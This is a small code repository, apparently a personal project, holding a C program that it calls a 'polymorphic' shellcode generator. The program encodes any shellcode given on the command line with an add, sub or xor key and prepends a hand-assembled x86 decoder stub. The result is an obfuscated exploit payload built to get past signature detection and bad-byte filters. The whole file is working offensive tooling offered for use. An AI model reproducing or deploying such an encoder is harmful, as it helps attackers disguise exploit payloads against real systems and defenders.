├── README.md
└── psg.c


/README.md:
--------------------------------------------------------------------------------
1 | "Polymorphic" shellcode generator
2 | 


--------------------------------------------------------------------------------
/psg.c:
--------------------------------------------------------------------------------
  1 | /*
  2 | "Polymorphic" shellcode generator - m0nad
  3 | */
  4 | 
  5 | #include <stdio.h>
  6 | #include <string.h>
  7 | #include <stdlib.h>
  8 | 
  9 | int calc(int , int, int);
 10 | void usage();
 11 | int decode_op(int);
 12 | 
 13 | enum OP {
 14 | 	SUB = 0x2c,
 15 | 	ADD = 0x04,
 16 | 	XOR = 0x34
 17 | };
 18 | 
 19 | int
 20 | main(int argc, char ** argv)
 21 | {
 22 | 	char * operation = argv[1]; 
 23 | 	unsigned int size;
 24 | 	unsigned short i, byte, key, op;
 25 | 	if (argc != 4)
 26 | 		usage(), exit(1);
 27 | 	if (!strcmp(operation, "add")) {
 28 | 		op = ADD;
 29 | 	} else if (!strcmp(operation, "sub")) {
 30 | 		op = SUB;
 31 | 	} else if (!strcmp(operation, "xor")) {
 32 | 		op = XOR;
 33 | 	} else
 34 | 		usage(), exit(1);
 35 | 	key = atoi(argv[2]);
 36 | 	size = strlen(argv[3]);
 37 | 	printf("shellcode %s 0x%.2x encoded:\n", argv[1], key);
 38 | 	printf("\"");
 39 | 	printf(
 40 | 				//_start:
 41 | "\\xeb\\x0d"			//    jmp    encoded
 42 | 				//decoder:
 43 | "\\x5e"				//    pop    %esi
 44 | "\\x6a\\x%.2x"			//    push   $size
 45 | "\\x5f"				//    pop    %edx
 46 | 				//decoder_loop:
 47 | "\\x83\\x%.2x\\x3e\\x%.2x"	//    inst   $key,(%esi,%edx,1)
 48 | "\\x4f"				//    dec    %edx
 49 | "\\x75\\xf9"			//    jne    decoder_loop
 50 | "\\xeb\\x05"			//    jmp    shellcode
 51 | 				//encoded:
 52 | "\\xe8\\xee\\xff\\xff\\xff",	//    call   decoder
 53 | 				//shellcode:
 54 | size, decode_op(op), key);
 55 | 
 56 | 	for(i = 0; i < size; i++) {
 57 | 		byte = (argv[3][i] & 0xff);
 58 | 		printf("\\x%.2x", calc(op, byte, key));
 59 | 	}
 60 | 	puts("\"");
 61 | 	return 0;
 62 | }
 63 | 
 64 | void
 65 | usage()
 66 | {
 67 | 	printf("Polymorphic shellcode generator - m0nad\n\n");
 68 | 	printf("Usage:\n\t./psg <type> <key> <bytes>\n");
 69 | 	printf("Types:\n\txor\n\tadd\n\tsub\n");
 70 | 	printf("Ex:\n\t./psg xor 10 $(cat shellcode)\n");
 71 | 	exit(1);
 72 | }
 73 | 
 74 | int
 75 | calc(int operation, int op1, int op2)
 76 | {
 77 | 	switch (operation) {
 78 | 		case ADD:
 79 | 			return op1 + op2;
 80 | 		case SUB:
 81 | 			return op1 - op2;
 82 | 		case XOR:
 83 | 			return op1 ^ op2;
 84 | 		default:
 85 | 			return 0;
 86 | 	}
 87 | }
 88 | 
 89 | int
 90 | decode_op(int op)
 91 | {
 92 | 	switch (op) {
 93 | 		case ADD:
 94 | 			return SUB;
 95 | 		case SUB:
 96 | 			return ADD;
 97 | 		case XOR:
 98 | 			return XOR;
 99 | 		default:
100 | 			return 0;
101 | 	}
102 | }
103 | 


--------------------------------------------------------------------------------